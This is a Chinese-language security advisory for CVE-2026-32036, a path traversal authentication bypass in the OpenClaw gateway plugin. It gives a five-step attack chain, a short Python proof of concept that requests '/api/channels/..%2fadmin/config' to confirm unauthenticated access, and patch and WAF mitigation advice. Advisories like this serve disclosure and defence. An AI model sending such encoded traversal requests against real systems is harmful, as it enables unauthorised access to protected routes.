IPBUF安全漏洞报告
English
CVE-2026-32036 CVSS 6.5 中危

CVE-2026-32036 OpenClaw路径遍历漏洞

披露日期: 2026-03-19

漏洞信息

漏洞编号
CVE-2026-32036
漏洞类型
路径遍历
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw gateway plugin

相关标签

路径遍历认证绕过OpenClawCVE-2026-32036

漏洞概述

OpenClaw gateway plugin 2026.2.26之前的版本存在路径遍历漏洞。由于对路径规范化的处理不当,远程攻击者可以通过构造包含编码点段遍历序列的恶意路径(如操作/api/channels),绕过路由认证检查,从而未经授权访问受保护的插件通道路由。

技术细节

该漏洞的核心在于OpenClaw网关插件对路径规范化的处理机制存在缺陷。攻击者利用 `/api/channels` 路径作为入口,通过在URL中插入经过URL编码的点段序列(例如使用 `%2e%2e` 代替 `..` 或 `%2f` 代替 `/`),构造出特殊的遍历路径。当网关处理程序接收到此类请求时,如果在执行安全检查(如认证中间件)之前就对路径进行了规范化解析,或者未能正确识别编码后的遍历字符,就会导致安全上下文被破坏。攻击者借此可以绕过原本用于保护敏感API的路由认证机制,直接访问受限的插件通道资源。该攻击无需用户交互且无需预先认证,具有较高的隐蔽性。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标系统运行的是OpenClaw gateway plugin且版本低于2026.2.26。
STEP 2
2. 构造恶意Payload
攻击者构造包含URL编码点段序列(如%2e%2e)的路径,附加到/api/channels路径后,旨在指向受保护的路由。
STEP 3
3. 发送恶意请求
攻击者向目标服务器发送精心设计的HTTP请求,请求中包含编码后的遍历路径。
STEP 4
4. 规范化与绕过
服务器端处理器规范化路径,由于安全检查未能阻止编码序列,认证机制被绕过。
STEP 5
5. 未授权访问
攻击者成功获取受保护插件通道路由的访问权限,可能导致敏感信息泄露或数据篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_vulnerability(target_url): # The payload uses encoded dot-segments to traverse paths # Example: accessing a protected route /api/admin via /api/channels/..%2fapi/admin payload_path = "/api/channels/..%2fadmin/config" full_url = f"{target_url}{payload_path}" headers = { "User-Agent": "CVE-2026-32036-Scanner" } try: response = requests.get(full_url, headers=headers, timeout=10) # Check if authentication was bypassed (e.g., HTTP 200 instead of 401/403) if response.status_code == 200: print("[+] Vulnerability Confirmed: Authentication bypassed!") print(f"[+] Response content length: {len(response.text)}") return True else: print(f"[-] Target returned status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target check_vulnerability(target)

影响范围

OpenClaw gateway plugin < 2026.2.26

防御指南

临时缓解措施
建议立即检查OpenClaw gateway plugin版本并应用官方补丁升级至2026.2.26或更高版本。在升级前,应通过配置网络访问控制列表(ACL)严格限制对/api/channels接口的访问权限,或部署Web应用防火墙(WAF)规则以检测和阻断包含编码点段序列(如..%2f, %2e%2e)的恶意流量,从而临时降低被攻击风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表